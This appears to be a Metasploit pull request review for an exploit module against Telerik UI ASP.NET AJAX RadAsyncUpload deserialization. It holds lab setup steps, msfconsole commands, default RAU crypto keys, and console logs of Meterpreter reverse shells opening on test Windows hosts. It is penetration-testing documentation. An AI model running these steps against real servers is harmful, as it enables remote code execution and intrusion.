Add exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization

[zeroSteiner]

This adds an exploit for Telerik UI ASP.NET AJAX RadAsyncUpload (RAU) Deserialization which will upload and execute a payload file. For this exploit to work, it is necessary for the attacker to know the crypto keys and the target version. The default values of the crypto keys were disclosed in CVE-2017-11317 which this module checks for and reports. The target version can be enumerated if the crypto keys are correctly set, that is to say they are either the default values from CVE-2017-11317 or the attacker knows them through some means. With the ability to upload a file, an attacker can have it loaded by leveraging a JSON .NET deserialization flaw. Starting in version 2019.3.1023 the serialization types can be allow-listed through an opt-in feature, while starting in version 2020.1.114 the allow-list feature is enabled by default. In either case, the allow-list can be explicitly configured with the setting necessary for exploitation by this module for testing purposes. See the "Configuring Telerik UI ASP.NET AJAX" section of the module docs for more information.

Mixed Mode Assembly

To exploit the deserialization flaw, it's necessary to upload a DLL that can then be loaded. This DLL must be a Mixed Mode Assembly. I opted to create new templates for this located at data/templates/template_x##_windows_mixed_mode.dll. These new templates use the existing source code of the standard DLL template, and are compiled using Visual Studio 2019 Pro with the included batch script. This makes Mixed Mode Assembly DLLs that can be used for this exploit that are also compatible with Metasploit's existing DLL generation routine. There's a README file in the new source code directory with some additional information.

Verification

I tested this with Telerik UI ASP.NET AJAX version 2020.3.915 (the latest).

Testing Installation Steps

1. Install the prerequisites
   • Internet Information Services (IIS)
   • Visual Studio 2019
   • SQL Server Express
2. Download and install the trial version of "Telerik UI for ASP.NET AJAX"
   • Select Visual Studio 2019 Support and Local Demos
3. Edit the web.config file to configure it to be vulnerable, these details are in the "Configuring Telerik UI ASP.NET AJAX" section of the module docs
4. Edit the applicationhost.config file to expose the HTTP server on a hostname so Metasploit can reach it from a different machine
   • Under sites > site > bindings > binding, change "bindingInformation" from :####:localhost to :8080:HOSTNAME where HOSTNAME is the hostname of your machine (don't forget to set the VHOST option in Metasploit)
5. Open the TelerikUI_for_AspNetAjax_Demos_VS2017.sln project file located in C:\Program Files (x86)\Progress\Telerik UI for ASP.NET AJAX R3 2020\Live Demos
   1. Use the green play button to run it in "Local IIS...". If there are build errors, select "Yes" to continue and run the last successful build.

• Start msfconsole
• Do: use exploit/windows/http/telerik_rau_deserialization
• Set the RHOSTS and PAYLOAD options
• Set any additional options as required by the previously selected payload
• Optionally set the VHOST, RPORT and SSL options as appropriate
• Set the VERSION option if it is known
• Run the exploit

Example Output

msf6 > use exploit/windows/http/telerik_rau_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/telerik_rau_deserialization) > set RHOSTS 192.168.159.129
RHOSTS => 192.168.159.129
msf6 exploit(windows/http/telerik_rau_deserialization) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/telerik_rau_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(windows/http/telerik_rau_deserialization) > set VHOST win10dev
VHOST => win10dev
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/http/telerik_rau_deserialization) > check
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[*] 192.168.159.129:8080 - The service is running, but could not be validated.
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
msf6 exploit(windows/http/telerik_rau_deserialization) > set VERSION 2020.3.915
VERSION => 2020.3.915
msf6 exploit(windows/http/telerik_rau_deserialization) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/http/telerik_rau_deserialization) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 29184 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:49466) at 2020-10-07 10:44:31 -0400
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
meterpreter > getuid
Server username: WIN10DEV\smcintyre
meterpreter > sysinfo
Computer        : WIN10DEV
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

[wvu]

Looks good, just a few things.

[wvu]

Testing

Note that FileDropper fails to delete the created DLL, since it's still in use. The pathname is reported for manual deletion.

Deployed in IIS

msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              192.168.123.173                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               8080                                                  yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /                                                     yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST                                                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\3Pb9Sh9m.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.173:62907) at 2020-10-20 13:06:34 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\3Pb9Sh9m.dll.tmp' on the target

meterpreter > getuid
Server username: IIS APPPOOL\Telerik UI for ASP.NET AJAX
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >

Deployed in Visual Studio

A pivot was necessary to reach the ASP.NET Development Server.

msf6 exploit(windows/http/telerik_rau_deserialization) > options

Module options (exploit/windows/http/telerik_rau_deserialization):

   Name                Current Setting                                       Required  Description
   ----                ---------------                                       --------  -----------
   DESTINATION         C:\Windows\Temp                                       yes       The destination folder for the upload
   FILE_NAME                                                                 no        The base file name for the upload (default will be random)
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RAU_ENCRYPTION_KEY  PrivateKeyForEncryptionOfRadAsyncUploadConfiguration  yes       The encryption key for the RAU configuration data
   RAU_SIGNING_KEY     PrivateKeyForHashOfUploadConfiguration                yes       The signing key for the RAU configuration data
   RHOSTS              127.0.0.1                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               62942                                                 yes       The target port (TCP)
   SSL                 false                                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI           /TelerikUI_for_AspNetAjax                             yes       The base path to the web application
   VERSION                                                                   no        The Telerik UI ASP.NET AJAX version
   VHOST               localhost                                             no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/http/telerik_rau_deserialization) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
[*] Checking version: 2020.3.915
[+] Uploaded 0 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
[!] The service is running, but could not be validated.
[+] Uploaded 30208 bytes to: C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.123.173
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.173:62995) at 2020-10-20 13:10:27 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target
[!] This exploit may require manual cleanup of 'C:\Windows\Temp\wFGTopoTsTqbufbD0l3ZUmxwwIe4RYr.dll.tmp' on the target

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter >

🚀

[wvu]

Release Notes

New module exploits/windows/http/telerik_rau_deserialization targets Telerik UI for ASP.NET AJAX, leveraging CVE-2017-11317 and CVE-2019-18935 to gain RCE against vulnerable targets.